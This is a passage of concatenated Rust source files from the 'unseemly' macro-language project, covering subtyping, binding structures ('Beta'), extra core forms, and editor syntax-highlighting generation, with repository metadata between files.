cust_rc_box!(|part_types: LazyWalkReses<Subtype>| { match (destr_forall(&part_types.this_ast), destr_forall(part_types.context_elt())) { (None, None) => { panic!("TODO") // TODO: rename to .subtype // Ok(f.type_compare.neg().clone()) } _ => { panic!("TODO") } } }) } fn automatically_extend_env() -> bool { true } fn walk_var(n: Name, cnc: &LazyWalkReses<Subtype>) -> Result<Assoc<Name, Ast>, TypeError> { // TODO: actually constrain unknowns, and ignore non-unknowns match cnc.env.find(&n) { // If it's protected, stop: Some(t) if &VariableReference(n) == t.c() => Ok(Assoc::new()), Some(t) => Ok(Assoc::single(n, crate::ty::synth_type(t, cnc.env.clone())?)), // Or canonicalize(t, cnc.env.clone()), ? None => ty_err!(UnboundName(n) at cnc.this_ast), } } // Simply protect the name; don't try to unify it. fn underspecified(nm: Name) -> Ast { ast!((vr nm)) } fn neg__env_merge( lhs: &Assoc<Name, Ast>, rhs: &Assoc<Name, Ast>, ) -> Result<Assoc<Name, Ast>, TypeError> { // combine constraints Ok(lhs.union_with(rhs, merge_bindings)) // TODO: handle types with mysteries embedded in them // Perhaps we can just recur into them at the end? } } impl NegativeWalkMode for Subtype { fn needs_pre_match() -> bool { false } // we hack `get_walk_rule` for a similar purpose } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnusedPositiveSubtype {} } impl WalkMode for UnusedPositiveSubtype { fn name() -> &'static str { "XXXXX" } type Elt = Ast; type Negated = Subtype; type AsPositive = UnusedPositiveSubtype; type AsNegative = Subtype; type Err = TypeError; type D = crate::walk_mode::Positive<UnusedPositiveSubtype>; type ExtraInfo = (); fn get_walk_rule(_: &Form) -> WalkRule<UnusedPositiveSubtype> { icp!() } fn automatically_extend_env() -> bool { icp!() } } pub fn must_subtype(sub: &Ast, sup: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { if sub as *const Ast == sup as *const Ast { return Ok(()); } if sub == sup { return Ok(()); } let result_env = walk::<Subtype>(sup, &parts.with_context(sub.clone()))?; let result_parts = parts.with_environment(result_env.clone()); for mystery in result_env.iter_values() { mystery_satisfiable(mystery, &result_parts)? } return Ok(()); } pub fn must_equal(lhs: &Ast, rhs: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { must_subtype(lhs, rhs, parts)?; must_subtype(rhs, lhs, parts) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/beta.rs
src/beta.rs
#![macro_use] use crate::{ alpha::Ren, ast::{Ast, Atom, ExtendEnv, Node, QuoteLess, QuoteMore}, ast_walk::LazyWalkReses, name::*, util::{assoc::Assoc, mbe::EnvMBE}, walk_mode::WalkElt, }; use std::fmt; custom_derive! { /** `Beta`s are always tied to a particular `Form`, and they have names that refer to the parts of that `Form`. They are generally used to talk about environmental operations, and they are most useful for typechecking (the evaluation process ignores them, because it needs to do more complex operations to calculate extended environments). `Beta`s are trees that determine how variables shadow each other, if multiple variables are being handled at once. The leaf nodes, `Basic` and `SameAs`, indicate (a) where the name comes from (b) where to get the type annotation (`Basic`) or an expression producing the type (`SameAs`) for that name. The more exotic leaf nodes, `Underspecified`, `Protected`, and `BoundButNotUsable` do various weird things. I have no idea where the name "β" came from, and whether it has any connection to α-equivalence. There's probably a very elegant way to make `Beta` just another kind of `Ast`. Finding it might require some time in the math mines, though. */ #[derive(PartialEq, Clone, Reifiable)] pub enum Beta { /// Both of these `Name`s refer to named terms in the current `Scope` /// (or `ResEnv`, for `Ast`s). /// The first is the identifier to import, and the second the syntax for its type. Basic(Name, Name), /// Like `Basic`, but here the second part is another expression /// which should be typechecked, and whose type the new name gets. /// (This can be used write to `let` without requiring a type annotation.) SameAs(Name, Box<Ast>), /// Names are introduced here, but bound to `Trivial`. /// Needed to avoid an infinite regress where the syntax for `Scope` does a self-import /// to expose the names it introduces to the (syntax for) betas that need them. BoundButNotUsable(Name), /// Name is introduced here (must be a single `Atom`), /// and its meaning is figured out from usage. Underspecified(Name), /// Name is left alone (must be a single `VarRef`, and already bound) Protected(Name), /// Shadow the names from two `Beta`s. Shadow(Box<Beta>, Box<Beta>), /// Shadow the names from a `Beta`, repeated. /// The `Vec` should always be equal to `names_mentioned(...)` of the `Beta`. ShadowAll(Box<Beta>, Vec<Name>), /// No names Nothing } } pub use self::Beta::*; impl fmt::Debug for Beta { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { Nothing => write!(f, "∅"), Shadow(ref lhs, ref rhs) => write!(f, "({:?} ▷ {:?})", lhs, rhs), ShadowAll(ref sub_beta, ref drivers) => { write!( f, "( {:?} ▷ ... by {})", sub_beta, drivers.iter().map(|name| name.print()).collect::<Vec<_>>().join(" ") ) } Basic(ref name, ref ty) => write!(f, "{}:{}", name, ty), SameAs(ref name, ref ty_source) => write!(f, "{}={}", name, ty_source), BoundButNotUsable(ref name) => write!(f, "!{}", name), Underspecified(ref name) => write!(f, "∀{}", name), Protected(ref name) => write!(f, "↫{}", name), } } } impl Beta { // TODO: alpha.rs needs a version of this that o,ots the RHS of `Basic` and `SameAs`. // but macro.rs needs this version. // (maybe it just needs `names_mentioned_and_bound`) pub fn names_mentioned(&self) -> Vec<Name> { match *self { Nothing => vec![], Shadow(ref lhs, ref rhs) => { lhs.names_mentioned().into_iter().chain(rhs.names_mentioned().into_iter()).collect() } ShadowAll(_, ref drivers) => drivers.clone(), Basic(n, v) => vec![n, v], SameAs(n, ref v_source) => { vec![n].into_iter().chain(v_source.free_vrs().into_iter()).collect() } BoundButNotUsable(n) => vec![n], Underspecified(n) => vec![n], Protected(n) => vec![n], } } // `Protected` doens't actually bind, so we shouldn't rename under it! pub fn names_mentioned_and_bound(&self) -> Vec<Name> { match *self { Nothing | Protected(_) => vec![], Shadow(ref lhs, ref rhs) => { let mut res = lhs.names_mentioned_and_bound(); let mut r_res = rhs.names_mentioned_and_bound(); res.append(&mut r_res); res } ShadowAll(ref sub, _) => sub.names_mentioned_and_bound(), // drivers is too broad! Basic(n, _) => vec![n], SameAs(n, _) => vec![n], BoundButNotUsable(n) => vec![n], Underspecified(n) => vec![n], } } // alpha::freshen_binders wants this to extract from complex payloads, hence `f` pub fn extract_from_mbe<T: Clone + std::fmt::Debug>( &self, parts: &EnvMBE<T>, f: &dyn Fn(&T) -> &Ren, ) -> Ren { match *self { Nothing => Ren::new(), Shadow(ref lhs, ref rhs) => { lhs.extract_from_mbe(parts, f).set_assoc(&rhs.extract_from_mbe(parts, f)) } ShadowAll(ref sub_beta, ref drivers) => { let mut res = Ren::new(); for parts in parts.march_all(drivers) { // Maybe `march_all` should memoize? res = res.set_assoc(&sub_beta.extract_from_mbe(&parts, f)); } res } Basic(n_s, _) | SameAs(n_s, _) | BoundButNotUsable(n_s) | Underspecified(n_s) | Protected(n_s) => f(parts.get_leaf_or_panic(&n_s)).clone(), } } } /// Find the environment represented by `b`. /// `SameAs` and `Basic` nodes will cause walking in `Mode`, which should be positive. /// TODO: Unfortunately, this means that they don't work well in the subtyping walk, for instance. pub fn env_from_beta<Mode: crate::walk_mode::WalkMode>( b: &Beta, parts: &LazyWalkReses<Mode>, ) -> Result<Assoc<Name, Mode::Elt>, Mode::Err> { // TODO: figure out why we *do* get called (during subtyping, apparently) // if !Mode::D::is_positive() { icp!("e_f_b on {:#?} in {} (negative)", b, Mode::name())} match *b { Nothing => Ok(Assoc::new()), Shadow(ref lhs, ref rhs) => { Ok(env_from_beta::<Mode>(&*lhs, parts)? .set_assoc(&env_from_beta::<Mode>(&*rhs, parts)?)) } ShadowAll(ref sub_beta, ref drivers) => { let mut res = Assoc::new(); for parts in parts.march_all(drivers) { res = res.set_assoc(&env_from_beta::<Mode>(&*sub_beta, &parts)?); } Ok(res) } Basic(name_source, rhs_source) => { if let &Atom(name) = parts.parts.get_leaf_or_panic(&name_source).term.c() { // let LazilyWalkedTerm {term: ref rhs_stx, ..} // = **parts.parts.get_leaf_or_panic(rhs_source); let rhs = parts.switch_to_positive().get_res(rhs_source)?; Ok(Assoc::new().set(name, rhs)) } else { panic!( "User error: {:#?} is supposed to supply names, but is not an Atom.", parts.parts.get_leaf_or_panic(&name_source).term ) } } // `res_source` should be positive and `name_source` should be negative. // Gets the names from `name_source`, treating `res_source` as the context. SameAs(name_source, ref res_source) => { use crate::walk_mode::WalkMode; // TODO: isn't this unhygienic in the case of collisions between part names and // names already in the environment? // Probably ought to just use `susbsitute` anyways. let mut env_for_parts = parts.env.clone(); for n in res_source.free_vrs() { env_for_parts = env_for_parts.set(n, parts.switch_to_positive().get_res(n)?); } let rhs_parts = parts.switch_to_positive().with_environment(env_for_parts); let ctxt: Mode::Elt = crate::ast_walk::walk::<<Mode as WalkMode>::AsPositive>(&res_source, &rhs_parts)?; // Do the actual work: let res = parts.switch_to_negative().with_context(ctxt).get_res(name_source)?; // ... and then check that it's the right set of names! // Somewhat awkward (but not unsound!) run-time error in the case that // the declared export does not match the actual result of negative type synthesis. // This is parallel to unbound variable name errors that we also don't protect against. // (This is more like FreshML/Redex than Pure FreshML/Romeo. // The latter have heavyweight logic systems that really aren't worth it, // because the errors in question aren't that bad to debug.) // For our purposes, this syntax is "real", so `quote_depth` is 0: let expected_res_keys = names_exported_by(parts.get_term_ref(name_source), 0); let mut count = 0; for (k, _) in res.iter_pairs() { if !expected_res_keys.contains(k) { panic!( "{} was exported (we only wanted {:#?} via {:#?})", k, expected_res_keys, res_source ); // TODO: make this an `Err`. And test it with ill-formed `Form`s } count += 1; } if count != expected_res_keys.len() { // TODO: Likewise: panic!("expected {:?} exports, got {}", expected_res_keys, count) } Ok(res) } BoundButNotUsable(name_source) => { // For our purposes, this syntax is "real", so `quote_depth` is 0: let expected_res_keys = names_exported_by(parts.get_term_ref(name_source), 0); let mut res = Assoc::new(); for name in expected_res_keys { res = res.set(name, <Mode::Elt as WalkElt>::from_ast(&ast!((trivial)))); } Ok(res) } Underspecified(ref name_source) => { if let &Atom(name) = parts.parts.get_leaf_or_panic(&name_source).term.c() { Ok(Assoc::new().set(name, Mode::underspecified(name))) } else { panic!( "{:#?} is supposed to supply names, but is not an Atom.", parts.parts.get_leaf_or_panic(name_source).term ) } } Protected(ref name_source) => { // Since protection isn't binding, it gets variable references instead if let ExtendEnv(boxed_vr, _) = parts.parts.get_leaf_or_panic(&name_source).term.c() { // HACK: rely on the fact that `walk_var` // won't recursively substitute until it "hits bottom" // Drop the variable reference right into the environment. Ok(Assoc::new().set(boxed_vr.vr_to_name(), Mode::Elt::from_ast(&*boxed_vr))) } else { panic!( "{:#?} is supposed to supply names, but is not an EE(VR()).", parts.parts.get_leaf_or_panic(name_source).term ) } } } } // Like `Beta`, but without type information (which gets added at the `import` stage). // At the moment, this seems to work better... custom_derive! { #[derive(PartialEq, Eq, Clone, Reifiable)] pub enum ExportBeta { /// Like `Basic`/`SameAs`/`Underspecified`/`Protected`, but without committing to a type Use(Name), Shadow(Box<ExportBeta>, Box<ExportBeta>), /// Shadow the names from a `ExportBeta`, repeated. /// The `Vec` should always be equal to `names_mentioned(...)` of the `ExportBeta`. ShadowAll(Box<ExportBeta>, Vec<Name>), /// No names Nothing } } impl fmt::Debug for ExportBeta { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { ExportBeta::Nothing => write!(f, "∅"), ExportBeta::Shadow(ref lhs, ref rhs) => write!(f, "({:#?} ▷ {:#?})", lhs, rhs), ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { write!(f, "( {:#?} ▷ ... by {:#?})", sub_beta, drivers) } ExportBeta::Use(ref name) => write!(f, "{:#?}", name), } } } impl ExportBeta { pub fn names_mentioned(&self) -> Vec<Name> { match *self { ExportBeta::Nothing => vec![], ExportBeta::Shadow(ref lhs, ref rhs) => { let mut res = lhs.names_mentioned(); let mut r_res = rhs.names_mentioned(); res.append(&mut r_res); res } ExportBeta::ShadowAll(_, ref drivers) => drivers.clone(), ExportBeta::Use(n) => vec![n], } } // This has an overly-specific type to match implementation details of alpha::freshen_binders. // Not sure if we need a generalization, though. pub fn extract_from_mbe<T: Clone + std::fmt::Debug>( &self, parts: &EnvMBE<T>, f: &dyn Fn(&T) -> &Ren, ) -> Ren { match *self { ExportBeta::Nothing => Ren::new(), ExportBeta::Shadow(ref lhs, ref rhs) => { lhs.extract_from_mbe(parts, f).set_assoc(&rhs.extract_from_mbe(parts, f)) } ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { let mut res = Ren::new(); for parts in parts.march_all(drivers) { // Maybe `march_all` should memoize? res = res.set_assoc(&sub_beta.extract_from_mbe(&parts, f)); } res } ExportBeta::Use(n_s) => f(parts.get_leaf_or_panic(&n_s)).clone(), } } } // Helper for `bound_from_[export_]beta`: fn names_exported_by(ast: &Ast, quote_depth: i16) -> Vec<Name> { use tap::tap::Tap; match ast.c() { Atom(n) => vec![*n], Node(_, sub_parts, export) => { if quote_depth <= 0 { bound_from_export_beta(export, sub_parts, quote_depth) } else { sub_parts.map_reduce( &|a: &Ast| names_exported_by(a, quote_depth), &|v1, v2| v1.clone().tap_mut(|v1| v1.append(&mut v2.clone())), vec![], ) } } ExtendEnv(body, _) => names_exported_by(body, quote_depth), QuoteMore(body, _) => names_exported_by(body, quote_depth + 1), QuoteLess(body, _) => names_exported_by(body, quote_depth - 1), ast if quote_depth <= 0 => icp!("beta SameAs refers to an invalid AST node: {}", ast), _ => vec![], } } // Like just taking the (non-Protected) keys from `env_from_beta`, but faster and non-failing. // It's a runtime error if the definition of a form causes `env_from_beta` to diverge from this. pub fn bound_from_beta(b: &Beta, parts: &EnvMBE<crate::ast::Ast>, quote_depth: i16) -> Vec<Name> { match *b { Nothing => vec![], Shadow(ref lhs, ref rhs) => { let mut res = bound_from_beta(&*lhs, parts, quote_depth); let mut res_r = bound_from_beta(&*rhs, parts, quote_depth); res.append(&mut res_r); res } ShadowAll(ref sub_beta, ref drivers) => { let mut res = vec![]; for sub_parts in &parts.march_all(drivers) { res.append(&mut bound_from_beta(&*sub_beta, sub_parts, quote_depth)); } res } SameAs(ref n_s, _) | BoundButNotUsable(ref n_s) => { // Can be a non-atom names_exported_by(parts.get_leaf_or_panic(n_s), quote_depth) } Protected(ref _n_s) => vec![], // Non-binding Basic(ref n_s, _) | Underspecified(ref n_s) => { vec![parts.get_leaf_or_panic(n_s).to_name()] } } } // Like just taking the keys from `env_from_export_beta`, but faster and non-failing pub fn bound_from_export_beta( b: &ExportBeta, parts: &EnvMBE<crate::ast::Ast>, quote_depth: i16, ) -> Vec<Name> { match *b { ExportBeta::Nothing => vec![], ExportBeta::Shadow(ref lhs, ref rhs) => { let mut res = bound_from_export_beta(&*lhs, parts, quote_depth); let mut res_r = bound_from_export_beta(&*rhs, parts, quote_depth); res.append(&mut res_r); res } ExportBeta::ShadowAll(ref sub_beta, ref drivers) => { let mut res = vec![]; for sub_parts in &parts.march_all(drivers) { res.append(&mut bound_from_export_beta(&*sub_beta, sub_parts, quote_depth)); } res } ExportBeta::Use(ref n_s) => { // Can be a non-atom names_exported_by(parts.get_leaf_or_panic(n_s), quote_depth) } } } // TODO NOW: make this return the atom-freshened node (possibly freshening recursive nodes) // We keep a table, keyed on leaf names and actual atoms, to keep track of the freshening. // This means that shadowing in leaf-named atom set doesn't get separated. // (e.g. `.[a : Int a : Int . ⋯].` freshens to `.[a🍅 : Int a🍅 : Int . ⋯].`). // As long as betas can't select a different shadowing direction, this isn't a problem. pub fn freshening_from_beta( b: &Beta, parts: &EnvMBE<crate::ast::Ast>, memo: &mut std::collections::HashMap<(Name, Name), Name>, ) -> Assoc<Name, Ast> { match *b { Nothing => Assoc::new(), Shadow(ref lhs, ref rhs) => freshening_from_beta(&*lhs, parts, memo) .set_assoc(&freshening_from_beta(&*rhs, parts, memo)), ShadowAll(ref sub_beta, ref drivers) => { let mut res = Assoc::new(); for parts in parts.march_all(drivers) { res = res.set_assoc(&freshening_from_beta(&*sub_beta, &parts, memo)); } res } Protected(_n_s) => unimplemented!("Not hard, just not used yet"), // TODO: n_s isn't necessarily just one name in the `SameAs` case! This is an ICP for sure. Basic(n_s, _) | SameAs(n_s, _) | Underspecified(n_s) | BoundButNotUsable(n_s) => { let this_name = parts.get_leaf_or_panic(&n_s).to_name(); Assoc::new().set( this_name, raw_ast!(VariableReference( *memo.entry((n_s, this_name)).or_insert_with(|| this_name.freshen()) )), ) } } } #[test] fn env_from_beta_basics() { let trivial_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let complex_ast = ast!({trivial_form; "a" => "aa", "b" => "bb", "c" => (vr "my_int"), "d" => (vr "S"), "e" => [@"3" "e0", "e1", "e2"], "f" => [@"3" (vr "S"), (vr "T"), (vr "S")], "g" => [@"3" (vr "my_int"), (vr "my_int"), (vr "my_int")], "S" => {"Type" "Nat" :} // same name as a varable in the environment }); let lwr = LazyWalkReses::<crate::ty::SynthTy>::new( assoc_n!("my_int" => uty!({Int :}), "S" => uty!(T), "T" => uty!({Int :})), assoc_n!(), complex_ast.clone(), ); assert_eq!(env_from_beta(&beta!([]), &lwr), Ok(assoc_n!())); assert_eq!(env_from_beta(&beta!(["a" : "d"]), &lwr), Ok(assoc_n!("aa" => uty!({Int :})))); assert_eq!( env_from_beta(&beta!([* ["e" : "f"]]), &lwr), Ok(assoc_n!("e0" => uty!({Int :}), "e1" => uty!({Int :}), "e2" => uty!({Int :}))) ); assert_eq!( env_from_beta(&beta!([*["e" = "g"]]), &lwr), Ok(assoc_n!("e0" => uty!({Int :}), "e1" => uty!({Int :}), "e2" => uty!({Int :}))) ); assert_eq!( env_from_beta(&beta!(["a" += {Type fn : [d] d}]), &lwr), Ok(assoc_n!("aa" => uty!({fn : [{Int :}] {Int :}}))) ); // Name collision: why isn't this failing? assert_eq!( env_from_beta(&beta!(["a" += {Type fn : [d] S}]), &lwr), Ok(assoc_n!("aa" => uty!({fn : [{Int :}] {Nat:}}))) ); assert_eq!(env_from_beta(&beta!(["a" : "S"]), &lwr), Ok(assoc_n!("aa" => uty!({Nat :})))); } // fn fold_beta<T>(b: Beta, over: Assoc<Name, T>, // leaf: Fn(&Ast ) -> S // TODO: Test negative quasiquotation (in a non end-to-end way): // '[Expr | (plus one (plus one (plus ,[lhs], ,[rhs], )))]' // #[test] // fn beta_with_negative_quasiquote() { // // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_extra_forms.rs
src/core_extra_forms.rs
use crate::{ ast::{Ast, AstContents::*}, ast_walk::{LazyWalkReses, WalkRule::*}, core_type_forms::get__primitive_type, grammar::FormPat, name::*, runtime::eval::Value, util::mbe::EnvMBE, }; use std::rc::Rc; pub fn extend__capture_language( pc: crate::earley::ParseContext, _starter_info: Ast, ) -> crate::earley::ParseContext { crate::earley::ParseContext { grammar: assoc_n!("OnlyNt" => Rc::new(FormPat::Named(n("body"), Rc::new(FormPat::Anyways(raw_ast!(Node( basic_typed_form!( [], // No syntax cust_rc_box!(|parts| { // Reify the current type environment: let mut struct_body = vec![]; for (k, v) in parts.env.iter_pairs() { struct_body.push(EnvMBE::new_from_leaves(assoc_n!( "component_name" => ast!((at *k)), "component" => v.clone() ))) } // HACK: Anything that was added to the prelude is phaseless. let phaseless_env = parts.prelude_env.cut_common( &crate::runtime::core_values::core_types()); let mut struct_body__phaseless = vec![]; for (k, v) in phaseless_env.iter_pairs() { struct_body__phaseless.push(EnvMBE::new_from_leaves(assoc_n!( "component_name" => ast!((at *k)), "component" => v.clone() ))) } Ok(ast!({"Type" "tuple" : "component" => [ (, get__primitive_type(n("LanguageSyntax"))), (, raw_ast!(Node(crate::core_forms::find("Type", "struct"), EnvMBE::new_from_anon_repeat(struct_body), crate::beta::ExportBeta::Nothing))), (, raw_ast!(Node(crate::core_forms::find("Type", "struct"), EnvMBE::new_from_anon_repeat(struct_body__phaseless), crate::beta::ExportBeta::Nothing)))] }))}), cust_rc_box!(move |parts| { Ok(Value::Sequence(vec![ // The captured language syntax: Rc::new(Value::ParseContext(Box::new(pc.clone()))), // Reifying the value environment is easy: Rc::new(Value::Struct(parts.env)) ]))}) ), EnvMBE::<Ast>::new(), crate::beta::ExportBeta::Nothing ))))))), // We can't just squirrel `reified_language` here: // these only affect earlier phases, and we need the language in phase 0 eval_ctxt: LazyWalkReses::<crate::runtime::eval::Eval>::new_empty(), type_ctxt: LazyWalkReses::<crate::ty::SynthTy>::new_empty(), } } // Shift the parser into the language specified in "filename". // TODO: This is probably unhygenic in some sense. Perhaps this needs to be a new kind of `Beta`? fn extend_import( _pc: crate::earley::ParseContext, starter_info: Ast, ) -> crate::earley::ParseContext { let filename = match starter_info.c() { // Skip "import" and the separator: Shape(ref parts) => match parts[2].c() { IncompleteNode(ref parts) => { parts.get_leaf_or_panic(&n("filename")).to_name().orig_sp() } _ => icp!("Unexpected structure {:#?}", parts), }, _ => icp!("Unexpected structure {:#?}", starter_info), }; let crate::Language { pc, type_env, type_env__phaseless, value_env } = crate::language_from_file(&std::path::Path::new(&filename)); crate::earley::ParseContext { grammar: pc.grammar.set( n("ImportStarter"), Rc::new(FormPat::Scope( basic_typed_form!( (named "body", (call "Expr")), cust_rc_box!(move |parts| { // HACK: Copied from `ExtendEnvPhaseless` LazyWalkReses { env: parts.env.set_assoc(&type_env) .set_assoc(&type_env__phaseless), prelude_env: parts.prelude_env.set_assoc(&type_env__phaseless), more_quoted_env: parts.more_quoted_env.iter().map( |e| e.set_assoc(&type_env__phaseless)).collect(), less_quoted_env: parts.less_quoted_env.iter().map( |e| e.set_assoc(&type_env__phaseless)).collect(), .. parts.clone() }.get_res(n("body")) }), cust_rc_box!(move |parts| { parts.with_environment( parts.env.set_assoc(&value_env)).get_res(n("body")) }) ), crate::beta::ExportBeta::Nothing, )), ), ..pc } } /// Some of these forms are theoretically implementable as macros from other forms, /// but for performance and debugability reasons, they are a part of Unseemly. /// Other of these forms are just not central to the design of Unseemly and have ad-hoc designs. /// /// Stored as a `FormPat` instead of a `SynEnv` /// because we need to merge this with the rest of the "Expr"s. pub fn make_core_extra_forms() -> FormPat { // I think we want to have "Stmt" separate from "Expr", once #4 is complete. // Should "Item"s be valid "Stmt"s? Let's do whatever Rust does. forms_to_form_pat![ typed_form!("prefab_type", [(lit "prefab_type"), (named "ty", (call "Type"))], /* type */ cust_rc_box!(move |part_types| { Ok(ast!({"Type" "type_apply" : "type_rator" => (, (get__primitive_type(n("Type")))), "arg" => [(, part_types.get_res(n("ty"))?)] })) }), /* evaluation */ // HACK: at evaluation time, nobody cares cust_rc_box!(move |_| { Ok(Value::AbstractSyntax(ast!((trivial)))) }) ), typed_form!("block", (delim "-{", "{", [(star [(named "effect", (call "Expr")), (lit ";")]), (named "result", (call "Expr"))]), /* type */ cust_rc_box!(move |part_types| { let _ = part_types.get_rep_res(n("effect"))?; part_types.get_res(n("result")) }), /* evaluation */ cust_rc_box!( move | part_values | { for effect_values in part_values.march_all(&[n("effect")]) { let _ = effect_values.get_res(n("effect"))?; } part_values.get_res(n("result")) })), typed_form!("capture_language", // Immediately descend into a grammar with one NT pointing to one form, // which has captured the whole parse context. (extend_nt [(lit "capture_language")], "OnlyNt", extend__capture_language), Body(n("body")), Body(n("body"))), typed_form!("import_language_from_file", (extend [(lit "import"), (call "DefaultSeparator"), (named "filename", (scan r"/\[(.*)]/"))], (named "body", (call "ImportStarter")), extend_import), Body(n("body")), Body(n("body"))), typed_form!("string_literal", (named "body", (scan_cat r#"\s*"((?:[^"\\]|\\"|\\\\)*)""#, "string.quoted.double")), cust_rc_box!(|_| { Ok(ast!({"Type" "String" :})) }), cust_rc_box!(|parts| { // Undo the escaping: Ok(Value::Text(parts.get_term(n("body")).to_name().orig_sp() .replace(r#"\""#, r#"""#) .replace(r#"\\"#, r#"\"#))) }) ), // Sequence literals. These actually can't be implemented as a macro // until we get recursive macro invocations: // there's no other way to go from a tuple to a sequence. typed_form!("seq_literal", (delim "s[", "[", (star (named "elt", (call "Expr")))), cust_rc_box!(|parts| { let mut elts = parts.get_rep_res(n("elt"))?; match elts.pop() { None => Ok(ast!({"Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]})})), Some(ref t) => { for ref other_elt in elts { crate::ty_compare::must_equal(t, other_elt, &parts).map_err( |e| crate::util::err::sp(e, parts.this_ast.clone()) )?; } Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(, t.clone())]})) } } }), cust_rc_box!(|parts| { Ok(Value::Sequence( parts.get_rep_res(n("elt"))?.into_iter().map(|elt| Rc::new(elt)).collect())) }) ) ] }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/highlighter_generation.rs
src/highlighter_generation.rs
use crate::{earley::parse, grammar::SynEnv}; pub fn ace_rules(se: &SynEnv) -> String { let mut categories = vec![]; let mut keyword_operators = vec![]; for (_, nt_grammar) in se.iter_pairs() { // Separate "keyword.operator" out; there are so many of them. // TODO: The principled thing to do would be to do this for each name... let (keyword_operator, mut normal) = nt_grammar .textmate_categories() .into_iter() .partition(|(_, cat)| cat == "keyword.operator"); categories.append(&mut normal); keyword_operators.append(&mut keyword_operator.into_iter().map(|(pat, _)| pat).collect()); } keyword_operators.sort(); keyword_operators.dedup(); // Make one big rule for all of them (will perform better, probably): categories.push((keyword_operators.join("|"), "keyword.operator".to_string())); // Order, roughly, by specificity of syntax: categories.sort_by(|a, b| { if a.1 == "keyword" { return std::cmp::Ordering::Less; } if b.1 == "keyword" { return std::cmp::Ordering::Greater; } if a.1.starts_with("string") { return std::cmp::Ordering::Less; } if b.1.starts_with("string") { return std::cmp::Ordering::Greater; } if a.1.starts_with("paren") { return std::cmp::Ordering::Less; } if b.1.starts_with("paren") { return std::cmp::Ordering::Greater; } if a.1.starts_with("keyword.operator") { return std::cmp::Ordering::Less; } if b.1.starts_with("keyword.operator") { return std::cmp::Ordering::Greater; } if a.1.starts_with("variable") { return std::cmp::Ordering::Less; } if b.1.starts_with("variable") { return std::cmp::Ordering::Greater; } std::cmp::Ordering::Equal }); categories.dedup(); let mut res = String::new(); for (pat, name) in categories { if let Ok(re) = regex::Regex::new(&pat) { if re.is_match("") { continue; // TODO: warn about regexes matching empty strings! } } else { continue; // TODO: warn about bad regexes! } res.push_str(&format!( "{{ token: '{}', regex: /{}/ }},\n", name, // Remove some regexp concepts not supported by JS: pat.replace(r"\p{Letter}", r"[a-zA-Z\xa1-\uFFFF]") .replace(r"\p{Number}", r"[0-9]") .replace("/", "\\/") // Escape slashes )) } res } pub fn dynamic__ace_rules(prog: &str, lang: &crate::Language) -> String { // This only works with the Unseemly syntax extension form, which sets this side-channel: crate::core_macro_forms::syn_envs__for__highlighting.with(|envs| envs.borrow_mut().clear()); // Errors are okay, especially late! let _ = parse(&crate::core_forms::outermost_form(), lang.pc.clone(), prog); let mut result = String::new(); crate::core_macro_forms::syn_envs__for__highlighting.with(|envs| { use indoc::writedoc; use std::fmt::Write; let mut prev_grammar = lang.pc.grammar.clone(); let mut cur_rule_name = "start".to_string(); let mut idx = 0; for (extender_ast, grammar) in &*envs.borrow() { let longest_line = extender_ast .orig_str(prog) .split('\n') .map(str::trim) .max_by(|a, b| a.len().cmp(&b.len())) .unwrap(); writedoc!( result, " {}: [ {{ token: 'text', regex: /(?={})/, next: 'still_{}' }}, {} ], ", cur_rule_name, regex::escape(longest_line).replace('/', "\\/"), cur_rule_name, ace_rules(&prev_grammar), ) .unwrap(); idx += 1; let next_rule_name = format!("lang_{}", idx); // Stay in the current language until we hit `in`. writedoc!( result, " still_{}: [ {{ token: 'keyword.operator', regex: 'in', next: '{}' }}, {} ], ", cur_rule_name, next_rule_name, ace_rules(&prev_grammar), ) .unwrap(); cur_rule_name = next_rule_name; prev_grammar = grammar.clone(); } writedoc!( result, " {}: [ {} ],", cur_rule_name, ace_rules(&prev_grammar), ) .unwrap(); }); result }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/unparse.rs
src/unparse.rs
use crate::{ ast::{Ast, AstContents, AstContents::*}, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, util::mbe::EnvMBE, }; fn node_names_mentioned(pat: &FormPat) -> Vec<Name> { match *pat { Named(n, ref body) => { let mut res = node_names_mentioned(&*body); res.push(n); res } Scope(_, _) => vec![], Pick(_, _) => vec![], Star(ref body) | Plus(ref body) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | VarRef(ref body) | Literal(ref body, _) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => node_names_mentioned(&*body), Seq(ref sub_pats) | Alt(ref sub_pats) => { let mut res = vec![]; for pat in sub_pats { res.append(&mut node_names_mentioned(pat)); } res } Biased(ref lhs, ref rhs) => { let mut res = node_names_mentioned(&*lhs); res.append(&mut node_names_mentioned(&*rhs)); res } Anyways(_) | Impossible | Scan(_, _) | Call(_) | SynImport(_, _, _) => vec![], } } pub fn unparse_mbe(pat: &FormPat, actl: &AstContents, context: &EnvMBE<Ast>, s: &SynEnv) -> String { // HACK: handle underdetermined forms let undet = 